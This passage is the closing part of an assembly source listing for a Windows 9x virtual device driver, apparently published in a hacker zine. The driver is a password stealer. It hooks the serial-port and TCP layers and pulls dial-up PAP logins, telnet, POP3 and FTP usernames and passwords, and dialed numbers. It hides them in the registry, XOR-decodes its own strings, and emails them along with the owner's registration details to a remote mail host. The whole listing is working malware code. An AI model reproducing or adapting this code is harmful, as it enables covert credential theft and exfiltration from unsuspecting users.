  1691.         rep movsb                       ; Copy it in the buffer
  1692.  
  1693.         mov ecx, BufferSize
  1694.         jz Send_Common_Abort            ; Stop tracing
  1695.         cmp ebx, ecx                    ; If Index < BufferSize end operation
  1696.         jb Send_Common_End
  1697.  
  1698. ; The buffer is full, precess the log and probably save it in the registry
  1699.  
  1700.         mov byte ptr [edi], 0           ; Null-terminate the log
  1701.  
  1702.         inc edi                         ; Buffer for the value name
  1703.         push edi                        ; We need to save this, because
  1704.                                         ; we will store two bytes in front
  1705.                                         ; of the string, returned by LogProc
  1706.  
  1707.         xor ebx, ebx
  1708.         mov bl, TraceType
  1709.         mov esi, TraceLetters
  1710.         mov al, byte ptr [esi+ebx]
  1711.         mov byte ptr [edi], al          ; Store a trace identifier
  1712.         inc edi
  1713.  
  1714.         mov byte ptr [edi], 20h         ; Store a space
  1715.         inc edi
  1716.  
  1717.         mov ValueName, edi
  1718.  
  1719.         call LogProc                    ; Process the log
  1720.  
  1721.         ; At this point ALL registers are fucked up, except eax
  1722.  
  1723.         pop ValueName
  1724.  
  1725.         test eax, eax                   ; Is there an error (eax=1)?
  1726.         jnz Send_Common_Abort
  1727.  
  1728. Get_Reg_Value:
  1729.         ; Try to get the value with the same name
  1730.  
  1731.         xor ebx, ebx
  1732.         mov dwTemp_1, ebx
  1733.         push offset32 dwTemp_1          ; cbData
  1734.         push ebx                        ; lpszData
  1735.         push ebx                        ; fdwType
  1736.         push ebx                        ; dwReserved
  1737.         push ValueName                  ; lpszValueName
  1738.         push hOurKey                    ; phKey
  1739.  
  1740.         VMMCall _RegQueryValueEx        ; Get the value of the key
  1741.         add esp, 18h
  1742.  
  1743.         cmp eax, ERROR_FILE_NOT_FOUND   ; If key exists
  1744.         jne Send_Common_Abort
  1745.  
  1746.         ; Save the result in the registry
  1747.  
  1748.         push BufferSize                 ; cbData
  1749.         push pBuffer                    ; lpszData
  1750.         push REG_SZ                     ; fdwType
  1751.         push 0                          ; dwReserved
  1752.         push ValueName                  ; lpszValueName
  1753.         push hOurKey                    ; phKey
  1754.  
  1755.         VMMCall _RegSetValueEx          ; Set the value of the key
  1756.         add esp, 18h
  1757.  
  1758. ; Store 'P' as the default value - flag that there is something to email
  1759.  
  1760.         push 1                          ; cbData
  1761.         push offset32 Letter_P          ; lpszData
  1762.         push REG_SZ                     ; fdwType
  1763.         push 0                          ; lpSubKey
  1764.         push hOurKey
  1765.  
  1766.         VMMCall _RegSetValue
  1767.         add esp, 14h
  1768.  
  1769. Send_Common_Abort:
  1770.         mov TraceType, 0
  1771.  
  1772. Send_Common_End:
  1773.         ret
  1774.  
  1775. EndProc Send_Common
  1776.  
  1777. ;---------------------------------------------------------------------------;
  1778. ; ModemLog procedure                                                        ;
  1779. ;---------------------------------------------------------------------------;
  1780. ;                                                                           ;
  1781. ; Used variables         Read    Write                                      ;
  1782. ;                                                                           ;
  1783. ; pBuffer                  x                                                ;
  1784. ; BufferSize               x                                                ;
  1785. ; ValueName                x                                                ;
  1786. ;                                                                           ;
  1787. ; Notes: Fucks off all registers, except EAX                                ;
  1788. ; Returns: eax = 0 - ok, 1 = error                                          ;
  1789. ;---------------------------------------------------------------------------;
  1790.  
  1791. BeginProc ModemLog
  1792.  
  1793. ; Try to find the dialed number and copy it as ValueName
  1794.  
  1795.         mov edi, pBuffer                ; Source
  1796.  
  1797.         xor ecx, ecx
  1798.  
  1799. FindATD_Loop:
  1800.         cmp word ptr [edi], "TA"        ; Search for ATD
  1801.         jne NotATD
  1802.         cmp byte ptr [edi+2], "D"
  1803.         jne NotATD
  1804.  
  1805.         add edi, 3
  1806.         jmp ATDFound
  1807.  
  1808. NotATD:
  1809.         inc edi
  1810.         inc ecx
  1811.         cmp ecx, BufferSize
  1812.         jae ModemLog_Abort              ; ATD not found in the buffer - abort
  1813.         jmp FindATD_Loop
  1814.  
  1815. ATDFound:
  1816.         mov edx, edi                    ; edx = beginning of phone number
  1817.         mov esi, edi
  1818.         sub ecx, BufferSize
  1819.         neg ecx                         ; ecx = size of the rest of buffer
  1820.         mov ebx, ecx
  1821.  
  1822.         mov al, 0Dh                     ; Search for <CR>
  1823.         repne scasb
  1824.         jnz ModemLog_Abort              ; <CR> not found after ATD command
  1825.  
  1826.         sub edi, edx
  1827.         mov ecx, edi                    ; ecx = phone number length
  1828.  
  1829.         sub ebx, ecx                    ; ebx = size of the rest of buffer
  1830.  
  1831.         mov esi, edx                    ; beginning of phone number
  1832.         mov edi, ValueName
  1833.         rep movsb                       ; Store the phone number as value name
  1834.  
  1835.         mov edx, edi                    ; edx = end of phone number
  1836.  
  1837.         cmp byte ptr [esi], '~'         ; Is PPP directly started (PAP auth)?
  1838.         jne Tilda_Loop
  1839.  
  1840.         ; It's PAP
  1841.  
  1842. PAP_Loop:
  1843.         cmp dword ptr [esi], 0123C07Eh  ; Is it PAP packet?
  1844.         je PAP_Found
  1845.  
  1846.         inc esi
  1847.         dec ebx
  1848.         jnz PAP_Loop
  1849.  
  1850.         jmp ModemLog_Abort              ; This shouldn't happen, but anyway...
  1851.                                         ; (either no auth or CHAP)
  1852.  
  1853. PAP_Found:
  1854.  
  1855. ; The PAP packet has the follwing structure:
  1856. ;
  1857. ; | 7E | C0 23 | 01 | xx | xx xx |  ULen  | U S E R |  PLen  | P A S S |
  1858. ; |    |       |    |    |       |        |         |        |         |
  1859. ; |PPP |  PAP  |code| id |length |user len|username |pass len|password |
  1860. ;
  1861.  
  1862.         add esi, 7                      ; Point to the Username length field
  1863.         xor ecx, ecx
  1864.         mov cl, byte ptr [esi]          ; Username length
  1865.         inc esi
  1866.         rep movsb                       ; Copy username
  1867.  
  1868.         mov ax, 0A0Dh                   ; Save a <CR> between username & pass
  1869.         stosw
  1870.  
  1871.         mov cl, byte ptr [esi]          ; Password length
  1872.         inc esi
  1873.         rep movsb                       ; Copy password
  1874.  
  1875.         jmp ModemLog_Final
  1876.  
  1877. Tilda_Loop:
  1878.         movsb                           ; Copy until ~ found (until PPP start)
  1879.  
  1880.         dec ebx
  1881.         jz Tilda_Not_Found
  1882.  
  1883.         cmp byte ptr [esi], '~'
  1884.         jne Tilda_Loop
  1885.  
  1886. ModemLog_Final:
  1887.         xor eax, eax
  1888.         stosb                           ; Null terminate the value name
  1889.         ret
  1890.  
  1891. Tilda_Not_Found:
  1892.         mov byte ptr [edx], 0           ; Null terminate after the phone num
  1893.         ret
  1894.  
  1895. ModemLog_Abort:
  1896.         xor eax, eax                    ; eax = 1 (error)
  1897.         inc eax
  1898.         ret
  1899.  
  1900. EndProc ModemLog
  1901.  
  1902. ;---------------------------------------------------------------------------;
  1903. ; TelnetLog procedure                                                       ;
  1904. ;---------------------------------------------------------------------------;
  1905. ;                                                                           ;
  1906. ; Used variables         Read    Write                                      ;
  1907. ;                                                                           ;
  1908. ; pBuffer                  x                                                ;
  1909. ; BufferSize               x                                                ;
  1910. ; ValueName                x                                                ;
  1911. ;                                                                           ;
  1912. ; Calls: DWord2Str                                                          ;
  1913. ; Returns: eax = 0 - ok, 1 = error                                          ;
  1914. ;                                                                           ;
  1915. ; Notes: Fucks off all registers, except EAX                                ;
  1916. ;---------------------------------------------------------------------------;
  1917.  
  1918. BeginProc TelnetLog
  1919.  
  1920.         ; Convert the IP to string and store it as value name
  1921.  
  1922.         mov ebx, IP
  1923.         mov edi, ValueName
  1924.  
  1925.         call DWordToStr                 ; Save the IP as the value name
  1926.  
  1927.         mov ax, 0A0Dh                   ; Save a <CR><LF>
  1928.         stosw
  1929.  
  1930.         mov esi, edi                    ; esi = address to write
  1931.  
  1932.         mov edi, pBuffer
  1933.         mov ecx, BufferSize
  1934.         mov ebx, ecx
  1935.  
  1936.         repne scasb                     ; Search for <CR>
  1937.         jne CR_Sequence_NotFound
  1938.  
  1939.         repne scasb                     ; Search for second <CR>
  1940.         jne CR_Sequence_NotFound
  1941.  
  1942.         std                             ; Decrement esi & edi
  1943.  
  1944.         sub ebx, ecx                    ; ebx - size to the beginning of buffer
  1945.         mov ecx, ebx
  1946.  
  1947.         inc ecx                         ; See the note bellow
  1948.         inc ecx
  1949.  
  1950.         xor al, al
  1951.         repne scasb
  1952.  
  1953. ; If NULL is found, edi points to the byte before it and we need to do
  1954. ; inc edi twice. Else, edi would point to the first char in the buffer
  1955. ; and we don't need to inc it.
  1956. ; That's why we have done 'inc ecx' twice a couple of lines before.
  1957. ; This way, if NULL is not found, edi points to the first-2 char
  1958. ; and we can (and must) do inc edi two times.
  1959.  
  1960.         inc edi
  1961.         inc edi
  1962.  
  1963.         ; Actually it doesn't matter if NULL is found. Just copy the rest.
  1964.  
  1965.         cld                             ; Increment esi & edi
  1966.  
  1967.         sub ebx, ecx                    ; ebx - size of username/pass string
  1968.         mov ecx, ebx
  1969.  
  1970.         xor esi, edi                    ; Swap esi & edi (Preslav Nakow rulez)
  1971.         xor edi, esi
  1972.         xor esi, edi
  1973.  
  1974.         rep movsb                       ; Copy the user/pass to value name
  1975.  
  1976.         xor eax, eax
  1977.         stosb                           ; Null terminate the value name
  1978.  
  1979.         mov edi, pBuffer
  1980.         mov ecx, BufferSize
  1981.  
  1982. Null_Loop:
  1983.         repnz scasb
  1984.         jnz End_Null_Loop
  1985.  
  1986.         mov byte ptr [edi-1], '.'
  1987.         or ecx, ecx
  1988.         jz End_Null_Loop
  1989.         jmp Null_Loop
  1990.  
  1991. End_Null_Loop:
  1992.  
  1993.         ret
  1994.  
  1995. CR_Sequence_NotFound:
  1996.         mov byte ptr [esi], 0           ; Null terminate after the IP
  1997.         ret
  1998.  
  1999. EndProc TelnetLog
  2000.  
  2001. ;---------------------------------------------------------------------------;
  2002. ; FtpLog procedure                                                          ;
  2003. ;---------------------------------------------------------------------------;
  2004. ; Used variables         Read    Write                                      ;
  2005. ;                                                                           ;
  2006. ; pBuffer                  x                                                ;
  2007. ; BufferSize               x                                                ;
  2008. ; ValueName                x                                                ;
  2009. ;                                                                           ;
  2010. ; Calls: Pop3Log, DWord2Str                                                 ;
  2011. ; Returns: eax = 0 - ok, 1 = error                                          ;
  2012. ;                                                                           ;
  2013. ; Notes: Fucks off all registers, except EAX                                ;
  2014. ;---------------------------------------------------------------------------;
  2015.  
  2016. BeginProc FtpLog
  2017.  
  2018.         call Pop3Log                    ; Process exactly like pop3
  2019.         test eax, eax
  2020.         jnz FtpLog_End
  2021.  
  2022.         mov edi, ValueName
  2023.         add edi, 10                     ; edi points to the username+1
  2024.  
  2025.         cmp dword ptr [edi+4], 'suom'   ; Is the username 'anonymous'?
  2026.         jne FtpLog_End
  2027.         cmp dword ptr [edi], 'ynon'
  2028.         jne FtpLog_End
  2029.  
  2030. FtpLog_Abort:
  2031.         xor eax, eax                    ; eax = 1 (error)
  2032.         inc eax
  2033.         ret
  2034.  
  2035. FtpLog_End:
  2036.         ret                             ; eax is set and the value name is
  2037.                                         ; already null-terminated
  2038.  
  2039. EndProc FtpLog
  2040.  
  2041. ;---------------------------------------------------------------------------;
  2042. ; Pop3Log procedure                                                         ;
  2043. ;---------------------------------------------------------------------------;
  2044. ; Used variables         Read    Write                                      ;
  2045. ;                                                                           ;
  2046. ; pBuffer                  x                                                ;
  2047. ; BufferSize               x                                                ;
  2048. ; ValueName                x                                                ;
  2049. ;                                                                           ;
  2050. ; Calls: DWord2Str                                                          ;
  2051. ; Returns: eax = 0 - ok, 1 = error                                          ;
  2052. ;                                                                           ;
  2053. ; Notes: Fucks off all registers, except EAX                                ;
  2054. ;---------------------------------------------------------------------------;
  2055.  
  2056. BeginProc Pop3Log
  2057.  
  2058.         ; Convert the IP to string and store it as value name
  2059.  
  2060.         mov ebx, IP
  2061.         mov edi, ValueName
  2062.  
  2063.         call DWordToStr                 ; Save the IP as the value name
  2064.  
  2065.         mov ax, 0A0Dh                   ; Save a <CR><LF>
  2066.         stosw
  2067.  
  2068.         mov esi, pBuffer
  2069.         mov ecx, BufferSize
  2070.         mov ebx, ecx
  2071.  
  2072.         mov eax, 'RESU'                 ; Search for USER
  2073.  
  2074. USER_or_PASS_Loop:
  2075.         cmp dword ptr [esi], eax        ; Search for USER or PASS (in eax)
  2076.         je USER_or_PASS_Copy_Loop_Start
  2077.  
  2078.         inc esi
  2079.         dec ecx
  2080.         jz Pop3Log_Abort
  2081.         jmp USER_or_PASS_Loop
  2082.  
  2083. USER_or_PASS_Copy_Loop_Start:
  2084.         add esi, 5                      ; Skip 'USER' and 'PASS'
  2085.  
  2086. USER_or_PASS_Copy_Loop:
  2087.         cmp byte ptr [esi], 0Dh         ; Is <CR> here?
  2088.         jne Copy_USER_or_PASS
  2089.  
  2090.         cmp al, 'P'                     ; Is this a PASS copy?
  2091.         je Pop3Log_End                  ; Work done, finish log processing
  2092.  
  2093.         mov ax, 0A0Dh                   ; Save a <CR> between username & pass
  2094.         stosw
  2095.  
  2096.         mov eax, 'SSAP'
  2097.         jmp USER_or_PASS_Loop
  2098.  
  2099. Copy_USER_or_PASS:
  2100.         movsb
  2101.         dec ecx
  2102.         jz Pop3Log_Abort
  2103.         jmp USER_or_PASS_Copy_Loop
  2104.  
  2105. Pop3Log_Abort:
  2106.         xor eax, eax                    ; eax = 1 (error)
  2107.         inc eax
  2108.         ret
  2109.  
  2110. Pop3Log_End:
  2111.         xor eax, eax
  2112.         stosb                           ; Null-terminate
  2113.         ret
  2114.  
  2115. EndProc Pop3Log
  2116.  
  2117. ;---------------------------------------------------------------------------;
  2118. ; DWordToStr procedure - input ebx, edi                                     ;
  2119. ;---------------------------------------------------------------------------;
  2120. ;                                                                           ;
  2121. ; Input: ebx - dword                                                        ;
  2122. ;        edi - lpstr                                                        ;
  2123. ;                                                                           ;
  2124. ; Output: edi - points to the next byte after the written string            ;
  2125. ;                                                                           ;
  2126. ; Preserves all registers, except edi                                       ;
  2127. ;---------------------------------------------------------------------------;
  2128.  
  2129. BeginProc DWordToStr
  2130.  
  2131.         pusha
  2132.  
  2133.         mov cx, 28
  2134.  
  2135. Digit_Loop_Start:
  2136.         mov eax, ebx
  2137.  
  2138.         shr eax, cl
  2139.         and al, 0Fh
  2140.  
  2141.         add al, 48                      ; "0"
  2142.         cmp al, 57                      ; "9"
  2143.         jbe Digit_ok
  2144.  
  2145.         add al, 7                       ; convert 10 to A, 11 to B, etc
  2146.  
  2147. Digit_ok:
  2148.         stosb
  2149.  
  2150.         sub cl, 4
  2151.         jge Digit_Loop_Start
  2152.  
  2153.         xor al, al
  2154.         stosb
  2155.  
  2156.         popa
  2157.  
  2158.         add edi, 8
  2159.  
  2160.         ret
  2161.  
  2162. EndProc DWordToStr
  2163.  
  2164. ;---------------------------------------------------------------------------;
  2165. ; Sendmail procedure                                                        ;
  2166. ;---------------------------------------------------------------------------;
  2167.  
  2168. BeginProc Sendmail
  2169.  
  2170.         ; ZMH
  2171.  
  2172.         mov Disable, 1                  ; We are busy
  2173.  
  2174.         ; Check if there is something to mail
  2175.  
  2176.         xor eax, eax
  2177.         push offset32 dwTemp_1          ; lpcbValue
  2178.         push eax                        ; lpValue
  2179.         push eax                        ; lpSubKey
  2180.         push hOurKey                    ; hKey
  2181.  
  2182.         VMMCall _RegQueryValue
  2183.         add esp, 10h
  2184.  
  2185.         or eax, eax                     ; cmp eax, ERROR_SUCCESS
  2186.         jnz Abort_Mail_Alloc
  2187.  
  2188.         cmp dwTemp_1, 1                 ; There is no value there
  2189.         jbe Abort_Mail_Alloc
  2190.  
  2191.         ; Allocate mail buffer and create the message
  2192.  
  2193.         VMMCall _HeapAllocate, <MAIL_BUFFER_LENGTH, 0>
  2194.         or eax, eax                     ; zero if error
  2195.         jz Abort_Mail_Alloc
  2196.         mov [pMailBuffer], eax          ; address of memory block
  2197.         mov [MailPointer], eax
  2198.  
  2199.         mov esi, offset32 MailData_1
  2200.         mov edi, eax
  2201.         mov ecx, cbMailData_1
  2202.         add MailPointer, ecx
  2203.         rep movsb
  2204.  
  2205.         push offset32 dwTemp_1          ; phKey
  2206.         push offset32 CurrentVersionSubKey ; SubKey
  2207.         push HKEY_LOCAL_MACHINE
  2208.  
  2209.         VMMCall _RegOpenKey             ; Open the key
  2210.         add esp, 0Ch
  2211.  
  2212.         or eax, eax                     ; cmp eax, ERROR_SUCCESS
  2213.         jnz Abort_Mail
  2214.  
  2215.         mov ebx, offset32 sRegisteredOwner
  2216.         call QueryRegValue
  2217.  
  2218.         mov ebx, offset32 sRegisteredOrganization
  2219.         call QueryRegValue
  2220.  
  2221.         mov ebx, offset32 sSystemRoot
  2222.         call QueryRegValue
  2223.  
  2224.         mov ebx, offset32 sVersionNumber
  2225.         call QueryRegValue
  2226.  
  2227.         push dwTemp_1                   ; hKey
  2228.         VMMCall _RegCloseKey            ; Close the key
  2229.         add esp, 04h
  2230.  
  2231.         ; Start enumerating the values
  2232.  
  2233.         mov dwTemp_1, 0
  2234.  
  2235. Enum_Loop:
  2236.         mov BufferSize, MAX_BUFFER_LENGTH
  2237.         push offset32 BufferSize        ; lpcbData
  2238.         push pBuffer                    ; lpbData
  2239.         push 0                          ; lpdwType
  2240.         push 0                          ; lpdwReserved
  2241.         mov eax, pMailBuffer
  2242.         add eax, MAIL_BUFFER_LENGTH
  2243.         mov ebx, MailPointer
  2244.         sub eax, ebx                    ; Calculate the free space in buffer
  2245.         mov dwTemp_2, eax
  2246.         push offset32 dwTemp_2          ; lpcchValue
  2247.         push MailPointer                ; lpszValue
  2248.         push dwTemp_1                   ; iValue
  2249.         push hOurKey                    ; hKey
  2250.  
  2251.         VMMCall _RegEnumValue           ; Get the value of the key
  2252.         add esp, 20h
  2253.  
  2254.         inc dwTemp_1                    ; dwTemp_1 = iValue + 1
  2255.  
  2256.         cmp eax, ERROR_NO_MORE_ITEMS
  2257.         je Enum_End
  2258.  
  2259.         or eax, eax                     ; cmp eax, ERROR_SUCCESS
  2260.         jne Abort_Mail
  2261.  
  2262.         mov esi, pBuffer
  2263.  
  2264.         mov edi, MailPointer
  2265.         add edi, dwTemp_2
  2266.  
  2267.         mov ecx, BufferSize
  2268.         rep movsb
  2269.  
  2270.         mov eax, 0A0D0A0Dh              ; Add two line breaks
  2271.         stosd
  2272.  
  2273.         mov MailPointer, edi
  2274.  
  2275.         jmp Enum_Loop
  2276.  
  2277. Enum_End:
  2278.         mov esi, offset32 MailData_2
  2279.         mov edi, MailPointer
  2280.         mov ecx, cbMailData_2
  2281.         mov eax, ecx
  2282.         add eax, MailPointer
  2283.         sub eax, pMailBuffer
  2284.         inc eax
  2285.         mov SendDataLength, eax
  2286.         rep movsb
  2287.  
  2288.         ; Open address object
  2289.  
  2290.         push offset32 TdiAddressOption
  2291.         push 6                                  ; Protocol (TCP)
  2292.         push offset32 TransportAddress
  2293.         push offset32 Request
  2294.         mov esi, TdiDispatchTable
  2295.         call dword ptr [esi]                    ; TdiOpenAddress
  2296.         add esp, 10h
  2297.  
  2298.         cmp eax, 0
  2299.         jnz Abort_Mail
  2300.  
  2301.         ; Save the address handle for future use
  2302.  
  2303.         mov eax, dword ptr Request
  2304.         mov AddressHandle, eax
  2305.  
  2306.         ; Open connection object
  2307.  
  2308.         push offset32 Context                   ; Context
  2309.         push offset32 Request
  2310.         mov esi, TdiDispatchTable
  2311.         call dword ptr [esi+8]                  ; TdiOpenConnection
  2312.         add esp, 8
  2313.  
  2314.         cmp eax, 0
  2315.         jnz Abort_Mail
  2316.  
  2317.         ; Save the connection context for future use
  2318.  
  2319.         mov eax, dword ptr Request
  2320.         mov ConnectionContext, eax
  2321.  
  2322.         ; Associate the connection context with the address handle
  2323.  
  2324.         push AddressHandle
  2325.         push offset32 Request
  2326.         mov esi, TdiDispatchTable
  2327.         call dword ptr [esi+10h]                ; TdiAssociateAddress
  2328.         add esp, 8h
  2329.  
  2330.         cmp eax, 0
  2331.         jnz Abort_Mail
  2332.  
  2333.         ; Connect to the mail host
  2334.  
  2335.         push offset32 RequestAddr
  2336.         push offset32 RequestAddr
  2337.         push 0                                  ; TO
  2338.         mov RequestContext, offset32 Send_1
  2339.         push offset32 Request
  2340.         mov esi, TdiDispatchTable
  2341.         call dword ptr [esi+18h]                ; TdiConnect
  2342.         add esp, 10h
  2343.  
  2344.         cmp eax, 0FFh                           ; If pending -> end proc
  2345.         ret
  2346.  
  2347. Call_TDI_CallBack:
  2348.         push 0                                  ; ByteCount
  2349.         push eax                                ; FinalStatus
  2350.         push offset32 RequestContext            ; pContext
  2351.         call TdiMail_Callback
  2352.         add esp, 0Ch
  2353.         ret
  2354.  
  2355. Abort_Mail:
  2356.         VMMCall _HeapFree, <pMailBuffer, 0>
  2357.  
  2358. Abort_Mail_Alloc:
  2359.         xor eax, eax
  2360.         mov Disable, al
  2361.         mov TracedHandle, eax
  2362.         ret
  2363.  
  2364. EndProc SendMail
  2365.  
  2366. ;---------------------------------------------------------------------------;
  2367. ; TdiMail_Callback                                                          ;
  2368. ;---------------------------------------------------------------------------;
  2369.  
  2370. BeginProc       TdiMail_Callback
  2371.  
  2372.         push ebp
  2373.         mov ebp, esp
  2374.  
  2375.         pushfd                          ; save flags on stack
  2376.         pushad                          ; save registers on stack
  2377.  
  2378. ; ebp+00h -> saved ebp
  2379. ; ebp+04h -> return address
  2380. ; ebp+08h -> pContext
  2381. ; ebp+0Ch -> FinalStatus
  2382. ; ebp+10h -> ByteCount
  2383.  
  2384.         mov eax, [ebp+08h]              ; RequestContext
  2385.  
  2386.         or eax, eax
  2387.         je TdiMail_Callback_End
  2388.  
  2389.         mov ebx, [ebp+0Ch]              ; If error -> close connection
  2390.         or ebx, ebx
  2391.         jne Close_Connection
  2392.  
  2393.         jmp dword ptr eax               ; RequestContext points to code
  2394.  
  2395. Send_1:
  2396.         mov RequestContext, offset32 Disconnect ; Pointer to next code
  2397.  
  2398.         mov eax, ConnectionContext      ; Get the ConnectionContext
  2399.         mov Request, eax
  2400.  
  2401.         push offset32 NDISBuffer
  2402.         push SendDataLength             ; Length
  2403.         push 0                          ; No flags
  2404.         push offset32 Request
  2405.         mov esi, TdiDispatchTable
  2406.         call dword ptr [esi+2Ch]        ; TdiSend
  2407.         add esp, 10h
  2408.  
  2409.         cmp eax, 0FFh                   ; If pending -> wait
  2410.         je TdiMail_Callback_End
  2411.  
  2412.         or eax, eax                     ; If error -> Close connection
  2413.         jnz Close_Connection
  2414.  
  2415.         jmp dword ptr [RequestContext]  ; If ok -> jump to next code
  2416.  
  2417. Disconnect:
  2418.         ; Delete the default value (send is done)
  2419.  
  2420.         xor eax, eax
  2421.         push eax                        ; cbData
  2422.         push offset32 Zero              ; lpszData
  2423.         push REG_SZ                     ; fdwType
  2424.         push eax                        ; lpSubKey
  2425.         push hOurKey
  2426.  
  2427.         VMMCall _RegSetValue
  2428.         add esp, 14h
  2429.  
  2430.         mov eax, ConnectionContext
  2431.         mov Request, eax
  2432.  
  2433.         mov RequestContext, offset32 Close_Connection ; Pointer to next code
  2434.  
  2435.         xor eax, eax
  2436.         push eax                        ; ReturnInfo
  2437.         push eax                        ; DiscConnInfo
  2438.         push eax                        ; Flags
  2439.         push eax                        ; TO
  2440.         push offset32 Request
  2441.         mov esi, TdiDispatchTable
  2442.         call dword ptr [esi+1Ch]        ; TdiDisconnect
  2443.         add esp, 14h
  2444.  
  2445.         cmp eax, 0FFh                   ; If pending -> wait
  2446.         je TdiMail_Callback_End
  2447.  
  2448. Close_Connection:
  2449.         VMMCall _HeapFree, <pMailBuffer, 0>
  2450.  
  2451.         xor ah, ah                      ; Undisable
  2452.         mov Disable, ah
  2453.  
  2454.         mov eax, AddressHandle
  2455.         mov Request, eax
  2456.  
  2457.         push offset32 Request
  2458.         mov esi, TdiDispatchTable
  2459.         call dword ptr [esi+04h]        ; TdiCloseAddress
  2460.         add esp, 4h
  2461.  
  2462. TdiMail_Callback_End:
  2463.         popad
  2464.         popfd
  2465.  
  2466.         pop ebp
  2467.         ret
  2468.  
  2469. EndProc         TdiMail_Callback
  2470.  
  2471. ;---------------------------------------------------------------------------;
  2472. ; QueryRegValue subroutine.                                                 ;
  2473. ;---------------------------------------------------------------------------;
  2474. ;                                                                           ;
  2475. ; Used variables         Read    Write                                      ;
  2476. ;                                                                           ;
  2477. ; dwTemp_1                 x                                                ;
  2478. ; pMailBuffer              x                                                ;
  2479. ; MailPointer              x       x                                        ;
  2480. ; dwTemp_2                         x                                        ;
  2481. ;                                                                           ;
  2482. ; Input: dwTemp_1 - opened key                                              ;
  2483. ;        ebx      - lpszSubKey                                              ;
  2484. ;                                                                           ;
  2485. ; Returns: returns to Abort_Mail if there is an error                       ;
  2486. ;---------------------------------------------------------------------------;
  2487.  
  2488. BeginProc QueryRegValue
  2489.  
  2490.         mov eax, pMailBuffer            ; Calculate the free space in buffer
  2491.         add eax, MAIL_BUFFER_LENGTH-9
  2492.         sub eax, MailPointer
  2493.         mov dwTemp_2, eax
  2494.         push offset32 dwTemp_2          ; cbData
  2495.         push MailPointer                ; lpszData
  2496.         push REG_SZ                     ; fdwType
  2497.         push 0                          ; dwReserved
  2498.         push ebx                        ; lpszSubKey
  2499.         push dwTemp_1                   ; phKey
  2500.  
  2501.         VMMCall _RegQueryValueEx        ; Get the value of the key
  2502.         add esp, 18h
  2503.  
  2504.         or eax, eax                     ; cmp eax, ERROR_SUCCESS
  2505.         jne Abort_Query
  2506.  
  2507.         mov edi, pMailBuffer
  2508.         mov ecx, MAIL_BUFFER_LENGTH
  2509.         mov al, 0
  2510.         repnz scasb
  2511.         jnz Abort_Query
  2512.  
  2513.         dec edi
  2514.         mov eax, 0A0D0A0Dh              ; Add two line breaks
  2515.         stosd
  2516.  
  2517.         mov MailPointer, edi
  2518.  
  2519.         ret
  2520.  
  2521. Abort_Query:
  2522.         pop eax                         ; Blah... Is approved by M$ as a
  2523.         push offset32 Abort_Mail        ; "good programming technique"? :-)
  2524.  
  2525.         ret
  2526.  
  2527. EndProc QueryRegValue
  2528.  
  2529.  
  2530. ;---------------------------------------------------------------------------;
  2531. ; Control Proc                                                              ;
  2532. ;---------------------------------------------------------------------------;
  2533.  
  2534. BeginProc Control_Proc
  2535.         Control_Dispatch Device_Init, Do_Device_Init
  2536.         clc
  2537.         ret
  2538. EndProc Control_Proc
  2539.  
  2540. VxD_LOCKED_CODE_ENDS
  2541.  
  2542. ;---------------------------------------------------------------------------;
  2543. ; Initialization Code Segment                                               ;
  2544. ;---------------------------------------------------------------------------;
  2545.  
  2546. VxD_ICODE_SEG
  2547.  
  2548. BeginProc Do_Device_Init
  2549.  
  2550.         pushfd                          ; save flags on stack
  2551.         pushad                          ; save registers on stack
  2552.  
  2553.         mov edi, ASCIIStart
  2554.         mov ecx, ASCIILength
  2555.  
  2556. Decode_Loop:                            ; Why 42...? :-)
  2557.         xor byte ptr [edi], 42
  2558.         inc edi
  2559.         loop Decode_Loop
  2560.  
  2561.         ; Allocate memory for the buffer
  2562.  
  2563.         VMMCall _HeapAllocate, <MAX_BUFFER_LENGTH, 0>
  2564.         or eax, eax             ; zero if error
  2565.         jz Abort
  2566.         mov [pBuffer], eax      ; address of memory block
  2567.  
  2568.         ; Hook VCOMM services
  2569.  
  2570.         GetVxDServiceOrdinal eax, _VCOMM_OpenComm
  2571.         mov esi, offset32 OpenComm_Hook
  2572.         VMMcall Hook_Device_Service
  2573.         jc Abort
  2574.  
  2575.         GetVxDServiceOrdinal eax, _VCOMM_WriteComm
  2576.         mov esi, offset32 WriteComm_Hook
  2577.         VMMcall Hook_Device_Service
  2578.         jc Abort
  2579.  
  2580.         GetVxDServiceOrdinal eax, _VCOMM_CloseComm
  2581.         mov esi, offset32 CloseComm_Hook
  2582.         VMMcall Hook_Device_Service
  2583.         jc Abort
  2584.  
  2585.         ; Make sure VTDI is present
  2586.  
  2587.         VxDcall VTDI_Get_Version
  2588.         jc Abort
  2589.  
  2590.         ; Get a pointer to the TCP dispatch table
  2591.  
  2592.         push offset32 TCPName
  2593.         VxDcall VTDI_Get_Info
  2594.         add esp, 4
  2595.  
  2596.         mov TdiDispatchTable, eax       ; Save the address of TdiDispatchTable
  2597.  
  2598.         ; Hook TdiCloseConnection, TdiConnect, TdiDisconnect and TdiSend
  2599.  
  2600.         mov ebx, [eax+0Ch]
  2601.         mov TdiCloseConnection_PrevAddr, ebx
  2602.         mov [eax+0Ch], offset32 TdiCloseConnection_Hook
  2603.  
  2604.         mov ebx, [eax+18h]
  2605.         mov TdiConnect_PrevAddr, ebx
  2606.         mov [eax+18h], offset32 TdiConnect_Hook
  2607.  
  2608.         mov ebx, [eax+1Ch]
  2609.         mov TdiDisconnect_PrevAddr, ebx
  2610.         mov [eax+1Ch], offset32 TdiDisconnect_Hook
  2611.  
  2612.         mov ebx, [eax+2Ch]
  2613.         mov TdiSend_PrevAddr, ebx
  2614.         mov [eax+2Ch], offset32 TdiSend_Hook
  2615.  
  2616.         ; Create/Open our key
  2617.  
  2618.         push offset32 hOurKey           ; phKey
  2619.         push offset32 OurKey            ; SubKey
  2620.         push HKEY_LOCAL_MACHINE
  2621.         VMMCall _RegCreateKey           ; Create/open "our" key
  2622.         add esp, 0Ch                    ; Clean after VMMCall
  2623.  
  2624.         or eax, eax                     ; cmp eax, ERROR_SUCCESS
  2625.         jnz Abort
  2626.  
  2627.         jmp Device_Init_End
  2628.  
  2629. Abort:
  2630.         mov Disable, 1                  ; Disable hook operation
  2631.  
  2632. Device_Init_End:
  2633.         popad                           ; restore registers on stack
  2634.         popfd                           ; restore flags on stack
  2635.  
  2636.         ret
  2637.  
  2638. EndProc Do_Device_Init
  2639.  
  2640. VxD_ICODE_ENDS
  2641.  
  2642.         END
  2643. <-->
  2644.  
  2645. ----[  EOF
  2646.